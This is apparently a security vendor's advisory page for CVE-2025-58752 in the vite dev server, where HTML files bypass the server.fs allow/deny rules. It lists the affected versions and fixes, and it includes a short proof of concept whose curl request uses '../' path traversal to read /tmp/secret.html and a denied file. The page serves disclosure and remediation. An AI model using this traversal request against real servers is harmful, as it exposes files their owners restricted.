CVE-2025-58752

CVE-2025-58752 is a low-severity security vulnerability in vite (npm), affecting versions >= 7.1.0, <= 7.1.4. It is fixed in 7.1.5, 7.0.7, 6.3.6, 5.4.20.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

Vite's server.fs settings were not applied to HTML files

Any HTML files on the machine were served regardless of the server.fs settings.

Details

The serveStaticMiddleware function is in charge of serving static files from the server. It returns the viteServeStaticMiddleware function which runs the needed tests and serves the page. The viteServeStaticMiddleware function checks if the extension of the requested file is ".html". If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case htmlFallbackMiddleware, and then to indexHtmlMiddleware. These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.

PoC

Execute the following shell commands:

npm  create  vite@latest
cd vite-project/
echo  "secret" > /tmp/secret.html
npm install
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'

The contents of /tmp/secret.html will be returned.

This will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:

echo  'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, "secret_files/*")]}}})'  >  [vite.config.js](http://vite.config.js)
mkdir secret_files
echo "secret txt" > secret_files/secret.txt
echo "secret html" > secret_files/secret.html
npm run dev

Then, in a different shell, run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'

You will receive a 403 HTTP Response,  because everything in the secret_files directory is denied.

Now in the same shell run the following command:

curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'

You will receive the contents of secret_files/secret.html.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or server.host config option)
  • appType: 'spa' (default) or appType: 'mpa' is used

This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.

Affected versions

vite (>= 7.1.0, <= 7.1.4) vite (>= 7.0.0, <= 7.0.6) vite (>= 6.0.0, <= 6.3.5) vite (<= 5.4.19)

Security releases

vite → 7.1.5 (npm) vite → 7.0.7 (npm) vite → 6.3.6 (npm) vite → 5.4.20 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade the following packages to resolve this vulnerability:

vite to 7.1.5 or later; vite to 7.0.7 or later; vite to 6.3.6 or later; vite to 5.4.20 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-58752? CVE-2025-58752 is a low-severity security vulnerability in vite (npm), affecting versions >= 7.1.0, <= 7.1.4. It is fixed in 7.1.5, 7.0.7, 6.3.6, 5.4.20.
  2. Which versions of vite are affected by CVE-2025-58752? vite (npm) versions >= 7.1.0, <= 7.1.4 is affected.
  3. Is there a fix for CVE-2025-58752? Yes. CVE-2025-58752 is fixed in 7.1.5, 7.0.7, 6.3.6, 5.4.20. Upgrade to this version or later.
  4. Is CVE-2025-58752 exploitable, and should I be worried? Whether CVE-2025-58752 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2025-58752 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2025-58752?
    • Upgrade vite to 7.1.5 or later
    • Upgrade vite to 7.0.7 or later
    • Upgrade vite to 6.3.6 or later
    • Upgrade vite to 5.4.20 or later

Other vulnerabilities in vite

Stop the waste.
Protect your environment with Kodem.